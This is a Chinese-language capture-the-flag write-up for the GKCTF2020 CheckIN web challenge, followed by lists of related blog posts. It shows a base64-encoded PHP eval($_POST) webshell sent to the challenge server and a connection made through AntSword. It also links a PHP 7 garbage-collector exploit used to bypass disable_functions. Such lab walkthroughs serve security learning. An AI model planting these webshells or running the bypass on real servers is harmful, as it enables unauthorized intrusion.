打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参

首先传参phpinfo();看看,需要经过base64编码

http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==


找到disable_functions,发现过滤了许多危险函数

我们上传一个一句话木马看看
eval($_POST[123]);,经过base64是ZXZhbCgkX1BPU1RbMTIzXSk7
执行

http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbMTIzXSk7

用菜刀,连不上,我呆了,还好有个蚁剑

再试一下,成功了

发现了flag,结果打不开,也修改不了权限

打开readflag看看,有乱码,想到是通过执行readflag来读取flag

然后怎么办,我在不会了。。。
看了大佬的wp后才知道做题要注意版本
通过phpinfo()知道php版本为7.3,这个版本有一个漏洞
php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3
给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
下载后进行修改,改为执行readflag


然后通过蚁剑进行上传这里发现tmp目录权限是1777,于是决定上传到这个目录

点击此处上传

通过之前的一句话来执行文件包含,得到flag

[GKCTF2020]CheckIN详解相关推荐

  1. Cobaltstrike系列教程(三)beacon详解

    0x000–前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-Beacon详解 1.Beac ...

  2. .user.ini上传详解附CTF例题

    .user.ini上传详解附CTF例题 题目 解法 https://buuoj.cn/challenges#[SUCTF%202019]CheckIn [SUCTF 2019]CheckIn 题目 解 ...

  3. 详解php://filter以及死亡绕过

    详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流.标准输入输出和错误描述符, 内存中.磁盘备份的临时文件流 ...

  4. 从命令行到IDE,版本管理工具Git详解(远程仓库创建+命令行讲解+IDEA集成使用)

    首先,Git已经并不只是GitHub,而是所有基于Git的平台,只要在你的电脑上面下载了Git,你就可以通过Git去管理"基于Git的平台"上的代码,常用的平台有GitHub.Gi ...

  5. JVM年轻代,老年代,永久代详解​​​​​​​

    秉承不重复造轮子的原则,查看印象笔记分享连接↓↓↓↓ 传送门:JVM年轻代,老年代,永久代详解 速读摘要 最近被问到了这个问题,解释的不是很清晰,有一些概念略微模糊,在此进行整理和记录,分享给大家.在 ...

  6. docker常用命令详解

    docker常用命令详解 本文只记录docker命令在大部分情境下的使用,如果想了解每一个选项的细节,请参考官方文档,这里只作为自己以后的备忘记录下来. 根据自己的理解,总的来说分为以下几种: Doc ...

  7. 通俗易懂word2vec详解词嵌入-深度学习

    https://blog.csdn.net/just_so_so_fnc/article/details/103304995 skip-gram 原理没看完 https://blog.csdn.net ...

  8. 深度学习优化函数详解(5)-- Nesterov accelerated gradient (NAG) 优化算法

    深度学习优化函数详解系列目录 深度学习优化函数详解(0)– 线性回归问题 深度学习优化函数详解(1)– Gradient Descent 梯度下降法 深度学习优化函数详解(2)– SGD 随机梯度下降 ...

  9. CUDA之nvidia-smi命令详解---gpu

    nvidia-smi是用来查看GPU使用情况的.我常用这个命令判断哪几块GPU空闲,但是最近的GPU使用状态让我很困惑,于是把nvidia-smi命令显示的GPU使用表中各个内容的具体含义解释一下. ...

最新文章

  1. Proovread安装与试用
  2. 如何理解pytorch 卷积里group 这个参数
  3. html 表单优化,用CSS3优化HTML5表单的步奏
  4. Windows的命令行窗口运行Python时,如何清屏?
  5. SpringCloud介绍(一)
  6. 函数hook注意事项
  7. 培养杰出程序员的捷径
  8. 懒癌晚期学图论的时候自己用C语言写了个求可达性矩阵的算法~
  9. PHP报错Warning: Unknown: Input variables exceeded 1000
  10. 字节码指令之对象的创建与访问指令
  11. 关于本特利内华达状态监测保护系统相关说明
  12. java中语言转换方法_语言切换的三种方法
  13. 积分商城使用教程之优惠券
  14. 二维数组传参 实例详解
  15. ''' 疯狂填词 创建一个疯狂填词(Mad Libs)程序,它将读入文本文件
  16. excel高级筛选怎么用_Excel高级筛选系列教程(完整版)-第一期基础功能介绍
  17. Tapestry经典入门教程
  18. GPS定位轨迹抽稀之道格拉斯-普克(Douglas-Peuker)算法详解
  19. Linux ln 命令是什么?C/C++代码实现
  20. 国内镜像源使用时出现WARNING: The repository located at mirrors.aliyun.com is not a trusted or secure host and

热门文章

  1. 《技术立国》——日立的小平浪平传
  2. cocos2dx内存优化
  3. Gitbook 插件安装 - 导航目录折叠 chapter-fold
  4. 在System.Timers.Timer的处理程序中调用MessageBox.Show()弹出的确是非模态的
  5. java推荐书单 什么值得读 (2021年1月8日更新)
  6. 记录一个问题:$router.push在setTimeout中的使用,显示找不到push
  7. fluent python 2nd edition_fluent python读书笔记2.2节
  8. spring+springMVC+mybatis 上篇
  9. PMP考试常见图表讲解:迭代燃尽图、S曲线图……
  10. 【C语言习题】统计君君提水的桶数(不使用ceil函数与floor函数)